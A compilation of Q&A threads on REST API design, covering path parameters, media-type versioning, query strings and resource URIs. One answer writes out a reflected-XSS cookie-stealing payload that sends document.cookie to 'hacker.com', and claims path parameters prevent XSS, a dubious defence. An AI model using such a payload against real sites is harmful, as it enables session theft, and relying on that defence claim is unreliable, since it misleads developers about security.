Is Unique ID for the resource is necessary a single string - rest

Most of the online tutorials has a end point the looked like this one
/users/{id}
- get
- post
I am currently on a platform where a 3rd party plugins can be integrated/installed and we are not sure, which third party plugins are installed by the customer. In order to get around this problem, we are thinking of converting the above mentioned example to some thing like this
/users/{vendorID}/{pluginID}/{artifactID}
- get
- post
A vendor can have multiple products/plugins and each plugin is made of multiple artifacts. So we assume {vendorID}/{pluginID}/{artifactID} is a unique resource. But this has a side effect of having two extra path parameters. Not sure if its the right ways.
Looking for some insights.
Thank you.

Endpoint path can include any number of path parameters. Multiple path parameters are very common when expressing the hierarchy of resources and subresources in an API. For example, GitHub's "Get a branch" endpoint is /repos/{owner}/{repo}/branches/{branch}.

It is perfectly fine, though you can define a function which merges the 3 strings into a single one.
The final addition to our constraint set for REST comes from the
code-on-demand style of Section 3.5.3 (Figure 5-8). REST allows client
functionality to be extended by downloading and executing code in the
form of applets or scripts. This simplifies clients by reducing the
number of features required to be pre-implemented. Allowing features
to be downloaded after deployment improves system extensibility.
However, it also reduces visibility, and thus is only an optional
constraint within REST.
https://www.ics.uci.edu/~fielding/pubs/dissertation/rest_arch_style.htm
Though if I would be a client developer I would not allow this from security perspective, but it is just as easy to do something like:
userID = base64Encode(JSON.stringify({vendorID, pluginID, artifactID}))
and write into your documentation that userIDs are generated this way or if you distribute userID, then just give the generated one to your users. It can be even not decryptable if you use SHA1 instead of BASE64. So it is not a big deal to generate a unique ID if you have multiple IDs which are unique together. What can be a problem with the upper approach that the JSON object might be unordered, so maybe a JSON array is a better solution or something that certainly keeps order, but not a simple template string like "{vendorID}-{pluginID}-{artifactID}", because that is injectable unlike a serialization method.

Related

Versioning related media types individually or in lockstep in a RESTful API

I'm developing a REST API around an ecommerce site and one of my resources is an Order which contains information like went it was made, the ID, the status, when it will be shipped, etc.
I have defined a media type for my Order resource like so:
application/vnd.myapp.order.v1+json
I also have defined another resource which is the status of an order, like so:
application/vnd.myapp.order-status.v1+json
My question is around the versioning of these media types. Seeing as they're related, would it make sense to version them in lockstep? For example, if the representation of the order resource changes and I create a application/vnd.myapp.order.v2+json, would it wise to also bump the version of the order-status media type to v2 as well? I'm also wondering if any there is a RESTful option with regards to the guidelines. I did have a look around online and couldn't really find anything talking about the best practice here, so any advice/opinions are appreciated.
I don't think mixing version and media type is a good idea.
In my opinion, you should separate it according to 'separate concerns principle' and 'single responsibility'.
https://en.wikipedia.org/wiki/Separation_of_concerns
https://en.wikipedia.org/wiki/Single-responsibility_principle
Many teams use header/url for versioning:
For example:
/api/v1/
/api/v2/
header {version:'v1'}
header {version:'v2'}
Then we can easily map the request with our need:
#RequestMapping(value="api/v1/books", consumes="application/json")
#RequestMapping(value="api/v2/books", consumes="application/json")
or
#RequestMapping(value="api/books",headers="version=v1", consumes="application/json")
#RequestMapping(value="api/books",headers="version=v2", consumes="application/json")
Although it seems useful it would be a violation of SoC and cause additional issues down the line as your API evolves.
Versioning your URLs is the better choice here, as URL is a perfect way to signal what type of resource is being dealt with and relation to the data it handles.
(To me introducing a custom header sounds much better design-wise then a custom versioned media type)
Custom media types are generally supposed to tell a consumer about the type of the data and its encoding scheme (e.g. xml vs json vs plain text and so on) and not how your fields are arranged from version to version while the encoding scheme is literally unchanged.
By choosing this path you would:
Force consumers of your API to tightly couple to that specific “representation” that creates maintenance issues on both sides.
Whenever you have multiple “versions” of your API co-existing at a given time - it introduce ambiguity when bodiless https methods such as DELETE or HEAD are used as the request information would simply be insufficient to correctly route your request, let alone the backend code completely.
It renders rels (Link Relation Types) less usable in their normal form (if you’d ever want to introduce them)

Complex requests with REST API

I am wondering if it is possible to adhere to REST principles when creating what will essentially amount to a BI tool.
In my scenario I have high data volume with 100,000's of IDs (frankly more than this but for the sake of this example let's go with that.). These are presented in a traditional table that allows for necessary features when accessing large data sets such as pagination. The user also has the ability to filter by one, or many of these ID's to drill down the data set as they see fit.
It is theoretically possible that the user would want to filter on 100 of the ID's, thus rendering a GET URI incredibly long. Which as I understand it would kind of break the resource identification principle of a REST API. Not to mention could potentially bump into the character limit in a GET request for certain browsers since the ID's may be quite long. Normally I would just use a POST since I can add all of the applied filters in the body and generate a where clause on the server.
Since a POST in a REST API is supposed to
Create a new entry in the collection.
By definition it would appear, at least to me that generating a complex query for something like this would mean that a REST API is not possible. Or does this perhaps mean that I am approaching the solution wrong (totally plausible).
It would seem that in my scenario using a GET simply isn't possible due to the potential length of the parameters. Thus I am forced to use a POST. Though using a POST as I am seems to violate REST style, which isn't the end of the world. I mostly just wanted to double check that I am not missing something and there is not a solution using a GET.
To follow the resources principle, make a search like resource. POST your ids in a body wto this endpoint and it will prepare a list of results for you and redirect you to searchresults/{id}.
See for example: https://gooroo.io/GoorooTHINK/Article/16583/HTTP-Patterns---Bouncer/25829#.W3aBsugzaUk

REST url proper format

my REST API format:
http://example.com/api/v1.0/products - get all products
http://example.com/api/v1.0/products/3 - get product with id=3
Also, the products can be orginized into a product groups.
What is a proper way to get all product groups according to REST best practices:
http://example.com/api/v1.0/products/groups
or
http://example.com/api/v1.0/productgroups
...
another option ?
I can't agree with Rishabh Soni because http://example.com/api/v1.0/products/groups may lead to ambiguity.
I would put my money on http://example.com/api/v1.0/productgroups or even better http://example.com/api/v1.0/product_groups (better readability).
I've had similar discussion here: Updating RESTful resources against aggregate roots only
Question: About the thing of /products/features or /product-features,
is there any consensus on this? Do you know any good source to ensure
that it's not just a matter of taste?
Answer: I think this is misleading. I would expect to get all features
in all products rather than get all possible features. But, to be
honest, it’s hard to find any source talking directly about this
problem, but there is a bunch of articles where people don’t try to
create nested resources like /products/features, but do this
separately.
So, we can't be sure http://example.com/api/v1.0/products/groups will return all possible groups or just all groups that are connected with all existing products (what about a group that has not been connected with the product yet?).
To avoid this ambiguity, you can add some annotation in documentation. But you can just prepare http://example.com/api/v1.0/product_groups and all is clear.
If you are developing Rest API for your clients than you should not rely on id's. Instead build a meaningful abbreviation and map them to actual id on server side.
If that is not possible, instead of using
http://example.com/api/v1.0/products/3 you can use http://example.com/api/v1.0/products?product_id=3 and then you can provide "product_id" description in the documentation. basically telling the client ways to use product_id.
In short a url must be meaningful and follow a pattern.The variable part must be send by in the url query(part after ? or POST payload)
With this, method to querying the server is also important. If client is trying to get something to the server he should use "GET" http request, similar POST http request if it is uploading new info and "PUT" request if it is updating or creating a new resource.
So by this analogy http://example.com/api/v1.0/products/groups is more appropriate as it is following a pattern(groups in product) while productgroups is more like a keyword with no pattern.
A directory like pattern is more easier to understand. Like in file systems(C:\Program Files\WinRAR), every part gets us to more generalized target.
You can also customize this for specific group- http://example.com/api/v1.0/products/groups?id=3

RESTful url to GET resource by different fields

Simple question I'm having trouble finding an answer to..
If I have a REST web service, and my design is not using url parameters, how can I specify two different keys to return the same resource by?
Example
I want (and have already implemented)
/Person/{ID}
which returns a person as expected.
Now I also want
/Person/{Name}
which returns a person by name.
Is this the correct RESTful format? Or is it something like:
/Person/Name/{Name}
You should only use one URI to refer to a single resource. Having multiple URIs will only cause confusion. In your example, confusion would arise due to two people having the same name. Which person resource are they referring to then?
That said, you can have multiple URIs refer to a single resource, but for anything other than the "true" URI you should simply redirect the client to the right place using a status code of 301 - Moved Permanently.
Personally, I would never implement a multi-ID scheme or redirection to support it. Pick a single identification scheme and stick with it. The users of your API will thank you.
What you really need to build is a query API, so focus on how you would implement something like a /personFinder resource which could take a name as a parameter and return potentially multiple matching /person/{ID} URIs in the response.
I guess technically you could have both URI's point to the same resource (perhaps with one of them as the canonical resource) but I think you wouldn't want to do this from an implementation perspective. What if there is an overlap between IDs and names?
It sure does seem like a good place to use query parameters, but if you insist on not doing so, perhaps you could do
person/{ID}
and
personByName/{Name}
I generally agree with this answer that for clarity and consistency it'd be best to avoid multiple ids pointing to the same entity.
Sometimes however, such a situation arises naturally. An example I work with is Polish companies, which can be identified by their tax id ('NIP' number) or by their national business registry id ('KRS' number).
In such case, I think one should first add the secondary id as a criterion to the search endpoint. Thus users will be able to "translate" between secondary id and primary id.
However, if users still keep insisting on being able to retrieve an entity directly by the secondary id (as we experienced), one other possibility is to provide a "secret" URL, not described in the documentation, performing such an operation. This can be given to users who made the effort to ask for it, and the potential ambiguity and confusion is then on them, if they decide to use it, not on everyone reading the documentation.
In terms of ambiguity and confusion for the API maintainer, I think this can be kept reasonably minimal with a helper function to immediately detect and translate the secondary id to primary id at the beginning of each relevant API endpoint.
It obviously matters much less than normal what scheme is chosen for the secret URL.

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.